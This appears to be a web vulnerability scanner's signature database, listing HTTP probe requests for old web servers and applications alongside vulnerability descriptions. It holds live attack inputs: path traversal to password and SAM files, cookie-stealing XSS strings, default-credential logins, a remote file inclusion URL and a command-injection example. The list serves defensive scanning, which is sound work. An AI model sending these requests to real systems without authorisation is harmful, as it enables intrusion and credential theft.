Sambar Server

#VERSION,1.188 #LASTMOD,07.23.2004 # http://www.cirt.net ######################################################################## # Checks: ws type,root,method,file,result,information,data to send ######################################################################## # ","","GET" # is vulnerable to Cross Site Scripting (XSS). CA-2000-02." ## These are the default site tests "apache","/","Celerra Web Manager","GET","Default EMC Cellera manager server is running." "apache","/","deafult Tomcat","GET","Appears to be a default Apache Tomcat install." "apache","/","EMC ControlCenter","GET","Default EMC ControlCenter manager server is running." "apache","/","instead of the website","GET","Appears to be a default Apache install." "apache","/","Test Page for Apache","GET","Appears to be a default Apache install." "compaq","/cpqlogin.htm","System Management Homepage","GET","Defaul Compaq/HP WBEM server is running." "compaq","/cpqlogin.htm","This is a private system","GET","Defaul Compaq/HP WBEM server is running." "dhost","/","DHost HTTP Server","GET","Default Novell NDS iMonitor was found. Default account may be 'sadmin' with no password." "dwhttpd","/","AnswerBook","GET","Default Sun Answerbook server running." "generic","/","Allaire Corporateion","GET","Default Jrun 2 server running." "generic","/","Cisco IP Phone","GET","Cisco VoIP Phone deafult web server found." "generic","/","Jaguar CTS","GET","Default Sybase Jaguar CTS server running." "generic","/","Jrun Management Console","GET","Default Jrun 3 server running." "generic","/","Lantronix","GET","Default Lantronix printer found." "generic","/","Storage Management","GET","Default IBM Tivoli Server Administration server is running." "generic","/","Welcome to the JMC","GET","Default Jrun 4 server running." "generic","/","XEROX WORKCENTRE","GET","Default Xerox WorkCentre server is running." "iis","/","The site you were trying to reach does not currently have a default page","GET","Appears to be a default IIS install." "iis","/","Welcome to IIS 4.0","GET","Appears to be a default IIS 4.0 install." "iis","/","Welcome to Microsoft Windows NT 4","GET","Appears to be a default IIS install." "lotus","/","body text=\"#000000\" bgcolor=\"#000000\" style="background-image:url(/homepage.nsf/homePage.gif?OpenImageResource)","GET","Appears to be a default Domino 6 install." "lotus","/","Domino 5","GET","Default Lotus Domino server running." "lotus","/","ESS Launch","GET","Default IBM TotalStorage server found." "netapp","/na_admin/","Network Appliance","GET","Default Network Appliance server found." "netscape","/","Web Server, Enterprise Edition 6.0","GET","Appears to be a default Netscape/iPlanet 6 install." "sambar","/","Sambar Server","GET","Appears to be a default Sambar install." "tivo","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","TiVoContainer","GET","TiVo client service is running and may allow download of mp3 or jpg files." "tivo","/TiVoConnect?Command=QueryServer","Calypso Server","GET","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media." ## These are normal tests "generic","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc","passwd","GET","EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193." "generic","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd","root:","GET","EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193." "generic","/logs/str_err.log","200","GET","Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries)." "abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version." "abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[windows]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version." "abyss","/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","index of","GET","Abyss 1.03 reveals directory listing when 256 /'s are requested." "abyss","/conspass.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request." "abyss","/consport.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request." "abyss","/general.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request." "abyss","/srvstatus.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request." "alchemyeye","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "alchemyeye","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "alchemyeye","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "apache","/.DS_Store","Bud1","GET","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version." "apache","/.FBCIndex","Bud2","GET","This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html" "apache","//","index of","GET","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page." "apache","//","not found for:","OPTIONS","By sending an OPTIONS request for /, the physical path to PHP can be revealed." "apache","/666%0a%0a666.jsp","","GET","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "apache","/?D=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." "apache","/?M=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." "apache","/?N=D","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." "apache","/?S=A","index of \/","GET","Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." "apache","/admin.cgi","Administration","GET","InterScan VirusWall administration is accessible without authentication." "apache","/blah-whatever.jsp","JSP file \"","GET","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CAN-2000-0759." "apache","/cgi-bin/main_menu.pl","NetDetector Traffic Analysis","GET","The NetDetector allows unauthenticated users to perform database queries." "apache","/cgi-bin/printenv","DOCUMENT_ROOT","GET","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431." "apache","/cgi-bin/printenv","Premature end of script headers: /","GET","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths. It may also allow XSS types of attacks. BID-4431." "apache","/cgi-bin/search","=sourcedir","GET","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value)." "apache","/cgi-bin/test-cgi","PATH_TRANSLATED","GET","Apache 2.0 default script is executable and reveals system information. All default scripts should be removed." "apache","/cgi-bin/test-cgi","Premature end of script headers: /","GET","Apache 2.0 printenv default script does not have execute permissions but leaks file system paths." "apache","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","root:","GET","SunPS iRunbook Version 2.5.2 allows files to be read remotely." "apache","/content/base/build/explorer/none.php?/etc/passwd","root:","GET","SunPS iRunbook Version 2.5.2 allows files to be read remotely." "apache","/doc/rt/overview-summary.html","Packages","GET","Oracle Business Components for Java 3.1 docs is running." "apache","/doc/webmin.config.notes","login and password","GET","Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000." "apache","/docs/","200","GET","May give list of installed software" "apache","/docs/sdb/en/html/index.html","Support Database","GET","This may be a default SuSe Apache install. This is the support page." "apache","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","[windows]","GET","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." "apache","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]","GET","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CAN-2002-0661." "apache","/error/HTTP_NOT_FOUND.html.var","Available variants","GET","Apache reveals file system paths when invalid error documents are requested." "apache","/examples/","Directory Listing","GET","Directory indexing enabled, also default JSP examples." "apache","/examples/jsp/index.html","JSP Samples","GET","Apache Tomcat default JSP pages present." "apache","/examples/jsp/snp/snoop.jsp","Request Information","GET","Displays information about page retrievals, including other users." "apache","/examples/jsp/source.jsp??","Directory Listing","GET","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed." "apache","/examples/servlet/AUX","200","GET","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file." "apache","/examples/servlet/TroubleShooter","TroubleShooter Servlet Output","GET","Tomcat default jsp page reveals system information and may be vulnerable to XSS." "apache","/examples/servlets/index.html","Servlet Examples","GET","Apache Tomcat default JSP pages present." "apache","/icons/","200","GET","Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used all, the /icons directory should be removed." "apache","/index.html.ca","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.cz.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.de","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.dk","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ee","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.el","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.en","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.es","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.et","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.fr","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.he.iso8859-8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.hr.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.it","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ja.iso2022-jp","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.kr.iso2022-kr","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ltz.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.lu.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.nl","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.nn","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.no","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.po.iso8859-2","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.pt","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.pt-br","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ru.cp-1251","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ru.cp866","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ru.iso-ru","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ru.koi8-r","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.ru.utf8","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.se","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.tw","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.tw.Big5","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/index.html.var","200","GET","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information." "apache","/interscan/","Administration","GET","InterScan VirusWall administration is accessible without authentication." "apache","/jservdocs/","200","GET","Default Apache JServ docs should be removed." "apache","/lpt9","FileNotFoundException:","GET","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher." "apache","/main_page.php","mazu.css","GET","Mazu Networks Profiler or Sensor is running." "apache","/manual/images/","200","GET","Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual should be removed and directory indexing disabled." "apache","/NetDetector/middle_help_intro.htm","NIKSUN-HELP","GET","The system appears to be a Niksun NetDetector (network monitoring). �The help files should be available at /NetDetector/quick_help_index.html" "apache","/oem_webstage/cgi-bin/oemapp_cgi","This script","GET","Oracle reveals the CGI source by prepending /oem_webstage to CGI urls." "apache","/oem_webstage/oem.conf","DocumentRoot","GET","Oracle reveals a portion of the Apache httpd.conf file." "apache","/php/php.exe?c:\boot.ini","boot loader","GET","The Apache config allows php.exe to be called directly."," " "apache","/pls/admin","ENVIRONMENT","GET","Oracle Apache+WebDB gives a lot of system information via the pls/admin script" "apache","/server-info","200","GET","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." "apache","/server-status","200","GET","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts." "apache","/servlet/MsgPage?action=test&msg=","","GET","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02." "apache","/servlet/org.apache.catalina.ContainerServlet/","","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." "apache","/servlet/org.apache.catalina.Context/","","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." "apache","/servlet/org.apache.catalina.Globals/","","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." "apache","/servlet/org.apache.catalina.servlets.WebdavStatus/","","GET","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." "apache","/servlets/MsgPage?action=badlogin&msg=","","GET","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02." "apache","/site/eg/source.asp","200","GET","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628." "apache","/soap/servlet/soaprouter","200","GET","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default." "apache","/soapConfig.xml","200","GET","Oracle 9iAS configuration file found - see bugrtraq #4290." "apache","/stronghold-info","200","GET","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CAN-2001-0868." "apache","/stronghold-status","200","GET","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CAN-2001-0868." "apache","/test","test hierarchy","GET","Apache Tomcat default file found. All default files should be removed." "apache","/test/jsp/buffer1.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/buffer2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/buffer3.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/buffer4.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/declaration/IntegerOverflow.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/extends1.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/extends2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/Language.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageAutoFlush.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageDouble.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageExtends.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageImport2.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageInfo.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageInvalid.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageIsErrorPage.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageIsThreadSafe.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/jsp/pageSession.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/test/realPath.jsp","WEBROOT","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed." "apache","/tomcat-docs/index.html","200","GET","Default Apache Tomcat documentation found." "apache","/XSQLConfig.xml","200","GET","Oracle 9iAS configuration file found - see bugrtraq #4290." "apache","/~nobody/etc/passwd","root:","GET","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf." "apache","@CGIDIRS.htaccess","200","GET","Contains authorization information" "apache","@CGIDIRStest-cgi.bat","200","GET","This is an Apache for Win default. If Apache is lower than 1.3.23, this can be exploited as in test-cgi.bat?|dir+c:+>..\htdocs\listing.txt, but may not allow data sent back to the browser." "cern","/.wwwacl","200","GET","Contains authorization information" "cern","/.www_acl","200","GET","Contains authorization information" "cern","@CGIDIRS.wwwacl","200","GET","Contains authorization information" "cern","@CGIDIRS.www_acl","200","GET","Contains authorization information" "cern","@CGIDIRSls"," neither '/","GET","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained." "citrix","/applist.asp","200","GET","Citrix server may allow remote users to view applications installed without authenticating." "citrix","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","boot loader","GET","Citrix CGI allows directory traversal." "compaq","/proxy/ssllogin?user=administrator&password=administrator",">administrator<","GET","Compaq Web-Based Management allows login with id/pass 'administrator'/'administrator'." "compaq","/proxy/ssllogin?user=administrator&password=operator",">operator<","GET","Compaq Web-Based Management allows login with id/pass 'operator'/'operator'." "compaq","/proxy/ssllogin?user=administrator&password=user",">user<","GET","Compaq Web-Based Management allows login with id/pass 'user'/'user'." "compaq","/Survey/Survey.Htm","System Components","GET","This Compaq device, without authentication, gives lots of system information." "compaq","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","General Information","GET","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL" "compaq","http://127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device","GET","The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html" "dwhttpd","/ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar","200","GET","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'." "dwhttpd","/ab2/\@AdminViewError","200","GET","Sun Answerbook allows viewing of the error logs without authentication." "generic","../../../../../../../../../../etc/*","passwd","GET","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system." "generic","../../../../../../../../../../etc/passw*","root:","GET","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system." "generic","/","PeopleSoft, Inc","GET","PeopleSoft appears to be running." "generic","/","samba is configured to deny","GET","Samba-swat web server. Used to administer Samba." "generic","/","TRACE / HTTP/1.","TRACE","TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details" "generic","/","TRACK / HTTP/1.","TRACK","TRACK option ('TRACE' alias) appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details" "generic","/%00","File Name","GET","Appending /%00 to a request to the web server may reveal a directory listing." "generic","/%00/","Directory listing of","GET","Remote directories can be retrieved, (this may be a Roxen server), upgrade the server." "generic","/%0a%0a.jsp","","GET","Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/%22%3cscript%3ealert(%22xss%22)%3c/script%3e","","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." "generic","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","root:","GET","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org)." "generic","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","[windows]","GET","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher." "generic","/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." "generic","/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e","","GET","Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server." "generic","/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html","","GET","Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server." "generic","/%3f.jsp","Directory Listing","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." "generic","/%3f.jsp","Index of","GET","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL." "generic","/%3f.jsp","WEB-INF","GET","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher." "generic","/%3f.jsp","WebTide","GET","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher." "generic","/<script>alert('Vulnerable');</script>","","GET","Server is vulnerable to cross site scripting (XSS) with HTML-encoded requests. CA-2000-02." "generic","/.%252e/.%252e/.%252e/winnt/boot.ini","boot loader","GET","JWalk Web server allows any file to be retrieved from the remote system." "generic","/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._","200","GET","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." "generic","/................../etc/passwd","root:","GET","The web server allows the password file to be retrieved." "generic","/.../.../.../.../.../.../.../.../.../.../etc/passwd","root:","GET","TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal." "generic","/.../.../.../.../.../.../.../.../.../boot.ini","boot loader","GET","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?" "generic","/../../../../../../../../../../etc/passwd","root:","GET","It is possible to read files on the server by adding ../ in front of file name." "generic","/../config.dat","EnablePasswords","GET","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass." "generic","/../webserver.ini","Authentic","GET","Nuca WebServer allows retrieval of the web server configuration." "generic","/..\..\..\..\..\..\temp\temp.class","200","GET","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version." "generic","/./","include\(\"","GET","Appending '/./' to a directory may reveal php source code." "generic","/.access","200","GET","Contains authorization information" "generic","/.addressbook","200","GET","PINE addressbook, may store sensitive e-mail address contact information and notes" "generic","/.bashrc","200","GET","User home dir was found with a shell rc file. This may reveal file and path information." "generic","/.bash_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." "generic","/.cobalt/sysManage/../admin/.htaccess","AuthName","GET","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory." "generic","/.forward","200","GET","User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to." "generic","/.history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." "generic","/.htaccess","200","GET","Contains authorization information" "generic","/.htpasswd","200","GET","Contains authorization information" "generic","/.lynx_cookies","200","GET","User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites." "generic","/.mysql_history","200","GET","Database SQL?" "generic","/.passwd","200","GET","Contains authorization information" "generic","/.pinerc","200","GET","User home dir found with a PINE rc file. May reveal system information, directories and more." "generic","/.plan","200","GET","User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol " "generic","/.proclog","200","GET","User home dir with a Procmail log file. May reveal user mail traffic, directories and more." "generic","/.procmailrc","200","GET","User home dir with a Procmail rc file. May reveal sub directories, mail contacts and more." "generic","/.profile","200","GET","User home dir with a shell profile was found. May reveal directory information and system configuration." "generic","/.rhosts","200","GET","A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web." "generic","/.sh_history","200","GET","A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web." "generic","/.ssh","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." "generic","/.ssh/authorized_keys","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." "generic","/.ssh/known_hosts","200","GET","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web." "generic","////./../.../boot.ini","boot loader","GET","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details." "generic","///etc/hosts","200","GET","The server install allows reading of any system file by adding an extra '/' to the URL." "generic","///etc/passwd","root:","GET","The server install allows reading of any system file by adding an extra '/' to the URL." "generic","//admin/admin.shtml","200","GET","Axis network camera may allow admin bypass by using double-slashes before URLs." "generic","//admin/aindex.htm","200","GET","FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt" "generic","//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>","","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02." "generic","//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>","","GET","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02." "generic","/","","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/.aspx","","GET","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02." "generic","/.jsp",".jsp","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/.shtml",".shtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/.thtml",".thtml","GET","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02." "generic","/?mod=&op=browse","","","GET","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02." "generic","/a/","200","GET","May be Kebi Web Mail administration menu." "generic","/a?","","GET","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server." "generic","/acart2_0/acart2_0.mdb","200","GET","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more." "generic","/acart2_0/admin/category.asp","200","GET","Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information." "generic","/acart2_0/admin/error.asp?msg=","","GET","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities" "generic","/acart2_0/admin/index.asp?msg=","","GET","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities" "generic","/acart2_0/deliver.asp?msg=","","GET","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities" "generic","/acart2_0/error.asp?msg=","","GET","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities" "generic","/acart2_0/signin.asp?msg=","","GET","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities" "generic","/accounts/getuserdesc.asp","200","GET","Hosting Controller 2002 administration page is available. This should be protected." "generic","/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","http://xxxxxxxxxx/atk/","GET","Achievo can be made to include php files from another domain. Upgrade to a new version." "generic","/active.log","WEBactive Http Server","GET","The WebActive log is accessible remotely." "generic","/add.php","Failed opening '","GET","Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages." 